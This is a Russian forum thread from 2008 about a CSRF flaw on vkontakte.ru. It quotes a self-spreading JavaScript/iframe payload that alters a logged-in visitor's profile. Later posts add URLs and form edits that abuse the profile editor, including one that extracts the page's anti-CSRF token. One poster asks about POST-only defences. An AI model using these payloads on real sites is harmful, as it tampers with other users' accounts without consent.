adsl club

Справочник
Форум
Программы
Фильмы
Ресурсы
Файлообмен
Хостинг
Ростелеком
CSRF на vkontakte.ru :)
Ответить на тему    Форум АДСЛ КлубаЦИФРОВОЙ ФЛЕЙМ :)ПРОГРАММИРОВАНИЕ
Автор Сообщение
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 13-03-08 : 14-31    Заголовок сообщения: CSRF на vkontakte.ru :) Ответить с цитатой
О том, что можно через GET запрос женить себя на себе же - это я быстро прочухал Smile Однако, этот вариант прям интересен =))

Цитата:
Обнаружил забавную атаку на сайт vkontakte.ru. При переходе на сайт tvoydohod.com, если вы в этот же момент авторизованы на вконтакте, отработает следующий джаваскрипт:
<script>
function doit() {
var html;
html = '<img src=http://vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com>';
window.frames["frm"].document.body.innerHTML = html;
}
</script>
<iframe name="frm" onload="doit()" width="0" height="0"></iframe>
Как видно, будет запрошена картинка с адресом vkontakte.ru/profileEdit.php?page=contacts&subm=1&website=http://tvoydohod.com, броузер сделает запрос по этому УРЛу, и на анкете в vkontakte ваше поле "Веб-сайт" станет равным tvoydohod.com.
Затем в вашем профайле, ваш друг, который вам доверяет кликнет на этот линк, и изменит профайл себе... И т д.
Этот вид атак называется Cross Site Request Forgery. В вики описаны все противоядия и куча полезной инфы.

Сам по себе CSRF довольно скучен. Но в данном случае забавно то, что каждый заразившийся становится разносчиком CSRF-линка.
Отписал в тех-поддержку, где столкнулся с "Это не баг!", "Не кликайте по подозрительным ссылкам!" и прочим. Надеюсь пользователей они ценят и поправят.
А вам было интересно узнать о таком простом "вирусе", который живет целиком в соц-сети =)

Отсюда http://habrahabr.ru/blog/webdev/37556.html

Я вот что думаю...если переменную, которая сообщает, что данные обновились, получать только как $_POST - это ведь предотвратит такие атаки ?
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Сайт
АльтернативщеГ
СообщениеДобавлено: Чт 13-03-08 : 14-43    Заголовок сообщения: Ответить с цитатой
а как жениться на самом себе?
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 13-03-08 : 14-55    Заголовок сообщения: Ответить с цитатой
Код:
http://vkontakte.ru/profileEdit.php?subm=1&status=4&with=тут надо вписать свой id
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Сайт
АльтернативщеГ
СообщениеДобавлено: Чт 13-03-08 : 14-57    Заголовок сообщения: Ответить с цитатой
не пашет
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 13-03-08 : 15-04    Заголовок сообщения: Ответить с цитатой
*смотрим ниже*Последний раз редактировалось: Richard Ferlow (Чт 13-03-08 : 15-13), всего редактировалось 2 раз(а)
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Сайт
АльтернативщеГ
СообщениеДобавлено: Чт 13-03-08 : 15-06    Заголовок сообщения: Ответить с цитатой
может у меня руки из попы? или ничего не меняется..
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 13-03-08 : 15-11    Заголовок сообщения: Ответить с цитатой
Так, еще вариант.

значит заходишь вот сюда

http://vkontakte.ru/profileEdit.php

Смотришь исходник страницы.

Код:

       <a href="profileEdit.php?page=photo" style="width:7.2em">Фотография</a>
      </li>
     </ul>
    </div>

   

    <div class="editorPanel clearFix">
      <form method="post" action="profileEdit.php" name="editBasic" id="editBasic">
      <input type="hidden" name="subm" id="subm" value="1">
      <input type="hidden" name="shash" id="shash" value="[b]тут вот код написан[/b]">


Код что нашел вписываешь в строку

Код:
http://vkontakte.ru/profileEdit.php?subm=1&shash=[b]вот тут[/b]&sex=2&status=4&with=цифровой id
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 13-03-08 : 15-13    Заголовок сообщения: Ответить с цитатой
Должно работать.

В первом посте описанное - на этой странице нет такого кода защитного.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Sslavik
Продвинутый форумчанин
СообщениеДобавлено: Ср 16-04-08 : 19-55    Заголовок сообщения: Ответить с цитатой
Ни работаить (
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 16-04-08 : 22-29    Заголовок сообщения: Ответить с цитатой
Sslavik
Что не рабоатет ?

Ссылку что получилось сюда покажи
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
d1n0
Эксперт
Предупреждений : 3
СообщениеДобавлено: Ср 16-04-08 : 22-56    Заголовок сообщения: Ответить с цитатой
не работает, серьезно!
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Ср 16-04-08 : 23-16    Заголовок сообщения: Ответить с цитатой
Показывайте ссылку, посмотрим.

Может изменили уже что-то.
Не буду же я не себе эксперементы ставить каждый раз, как кто-то сказал - не работает.
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
BS
Эксперт
СообщениеДобавлено: Чт 17-04-08 : 17-06    Заголовок сообщения: Ответить с цитатой
Как на приёме у Врача)
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение Посетить сайт автора   Номер ICQ
Richard Ferlow
Гуру
Предупреждений : 2
СообщениеДобавлено: Чт 17-04-08 : 17-10    Заголовок сообщения: Ответить с цитатой
BS
Ну вот ссылку не дают, значит не интересно, чего я напрягаться буду Smile)
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
I_273
Форумчанин
СообщениеДобавлено: Чт 17-04-08 : 20-47    Заголовок сообщения: Ответить с цитатой
Sslavik
бомбардир
Делайте так, заходите в
Код:
http://vkontakte.ru/profileEdit.php

сохраняете страницу, открываете ее и правите:
Код:
<div class="editorPanel clearFix">
      <form method="post" action="profileEdit.php" name="editBasic" id="editBasic">

на
Код:
<div class="editorPanel clearFix">
      <form method="post" action="http://vkontakte.ru/profileEdit.php" name="editBasic" id="editBasic">

затем ниже:
Код:
 <option value="0"> ... </option>

на
Код:
 <option value='ваш id'> ... </option>

открываете и выбирайте, хоть помолвлен, хоть женат
 Наверх
Посмотреть профиль / Отправить личное сообщение Отправить личное сообщение   Номер ICQ
Показать сообщения:   
Ответить на тему    Форум АДСЛ КлубаЦИФРОВОЙ ФЛЕЙМ :)ПРОГРАММИРОВАНИЕ Часовой пояс: GMT + 7
Страница 1 из 1

 

 
Аватары: Вкл|Выкл   ЮзерИнфо: Вкл|Выкл   Подписи: Вкл|Выкл
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете вкладывать файлы
Вы можете скачивать файлы